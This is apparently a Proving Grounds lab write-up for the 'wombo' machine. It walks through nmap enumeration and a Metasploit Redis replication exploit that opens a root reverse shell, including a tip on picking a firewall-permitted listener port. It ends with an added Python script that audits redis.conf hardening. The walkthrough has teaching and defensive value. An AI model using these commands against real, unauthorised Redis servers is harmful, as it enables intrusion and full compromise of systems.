wombo

Exploitation Guide for wombo | Proving Grounds


Last updated 3 years ago


Summary:

We will exploit an exposed Redis instance to get remote code execution (RCE).

Enumeration:

Nmap:

# nmap -sSVC -T4 -v -p- -oN nmapFull.txt 192.168.212.69
Nmap scan report for 192.168.212.69
Host is up (0.24s latency).
Not shown: 65529 filtered ports
PORT      STATE  SERVICE    VERSION
22/tcp    open   ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
|   256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
|_  256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
53/tcp    closed domain
80/tcp    open   http       nginx 1.10.3
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
6379/tcp  open   redis      Redis key-value store 5.0.9
8080/tcp  open   http-proxy
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries 
|_/admin/ /reset/ /compose
|_http-title: Home | NodeBB
27017/tcp open   mongodb    MongoDB 4.0.18

Here we find out that a Redis service (v5.0.9) is running on the system.

Exploitation:

Searchsploit:

A quick search with searchsploit shows a Metasploit module for Unauthenticated Code Execution against Redis 4.x / 5.x.

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/wombo/scans]
└─$ searchsploit redis 5                                                        
--------------------------------------------------- ---------------------------------
 Exploit Title                                     |  Path
--------------------------------------------------- ---------------------------------
Microsoft Windows 10 - Diagnostics Hub Standard Co | windows/local/45244.txt
Redis 4.x / 5.x - Unauthenticated Code Execution ( | linux/remote/47195.rb
Redis 5.0 - Denial of Service                      | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)            | linux/local/44904.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results

Metasploit:

Use the module linux/redis/redis_replication_cmd_exec and set the options as follows.

Be sure to use a port that is open on the target system (here 8080) as LPORT, so the reverse connection doesn't get blocked by the firewall.

   ┌──(imtodess㉿deathnote)-[~/…/boxes/pg/wombo/exploits]
   └─$ msfconsole
   ...
   msf5 > use linux/redis/redis_replication_cmd_exec
   msf5 exploit(linux/redis/redis_replication_cmd_exec) > show options
   
   Module options (exploit/linux/redis/redis_replication_cmd_exec):
   
      Name      Current Setting  Required  Description
      ----      ---------------  --------  -----------
      CUSTOM    true             yes       Whether compile payload file during exploiting
      PASSWORD  foobared         no        Redis password for authentication test
      RHOSTS    192.168.212.69   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
      RPORT     6379             yes       The target port (TCP)
      SRVHOST   192.168.83.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
      SRVPORT   6379             yes       The local port to listen on.
   
   
   Payload options (linux/x64/shell_reverse_tcp):
   
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      LHOST  192.168.83.129   yes       The listen address (an interface may be specified)
      LPORT  8080             yes       The listen port
   
   
   Exploit target:
   
      Id  Name
      --  ----
      0   Automatic
   
   
   msf5 exploit(linux/redis/redis_replication_cmd_exec) > run
   
   [*] Started reverse TCP handler on 192.168.83.129:8080 
   [*] 192.168.212.69:6379   - Compile redis module extension file
   [+] 192.168.212.69:6379   - Payload generated successfully! 
   [*] 192.168.212.69:6379   - Listening on 192.168.83.129:6379
   [*] 192.168.212.69:6379   - Rogue server close...
   [*] 192.168.212.69:6379   - Sending command to trigger payload.
   [*] Command shell session 2 opened (192.168.83.129:8080 -> 192.168.212.69:59796) at 2020-04-24 15:19:25 +0800
   [!] 192.168.212.69:6379   - This exploit may require manual cleanup of './fkyrakg.so' on the target
   whoami
   root
   
   cat proof.txt
   <Redacted>
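As an added defender-side example (not part of the original writeup), the script below parses a redis.conf and flags the settings that make the replication / MODULE LOAD code-execution path used above possible: an instance bound to all interfaces with protected-mode off and no requirepass, and the SLAVEOF/REPLICAOF/MODULE/CONFIG/DEBUG commands left reachable. Redis 5 has no ACLs, so rename-command is the way to take those commands away from clients; both config samples are constructed and the password is a placeholder.

```python
"""Audit a redis.conf for the settings behind the unauthenticated replication / MODULE LOAD RCE path."""
# Commands the rogue-master technique relies on; on Redis < 6 only rename-command can remove them.
DANGEROUS_COMMANDS = {"slaveof", "replicaof", "module", "config", "debug"}

# Constructed sample resembling an exposed instance (not taken from the box).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
"""

# Constructed sample with the mitigations applied; the password is a placeholder.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
requirepass <PLACEHOLDER-LONG-RANDOM-PASSWORD>
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command CONFIG ""
rename-command DEBUG ""
"""


def parse_redis_conf(text: str) -> dict:
    """Collect directives as {name: [value, ...]}; rename-command may repeat."""
    conf: dict = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if line:
            name, _, value = line.partition(" ")
            conf.setdefault(name.lower(), []).append(value.strip())
    return conf


def audit_redis_conf(text: str) -> list:
    """Return findings; an empty list means this code-execution path is closed."""
    conf = parse_redis_conf(text)
    findings = []
    binds = " ".join(conf.get("bind", [])).split()
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: reachable on all interfaces")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if not any(v.strip("\"'") for v in conf.get("requirepass", [])):
        findings.append("requirepass: unset, clients connect unauthenticated")
    # A command counts as mitigated when it has been renamed (to "" disables it outright).
    renamed = {e.split()[0].lower() for e in conf.get("rename-command", []) if len(e.split()) == 2}
    for cmd in sorted(DANGEROUS_COMMANDS - renamed):
        findings.append(f"rename-command: {cmd.upper()} still reachable")
    return findings
```

The same checks apply to a live instance's CONFIG GET output once you have authenticated access, but auditing the file works offline and catches the weak state before the service is exposed.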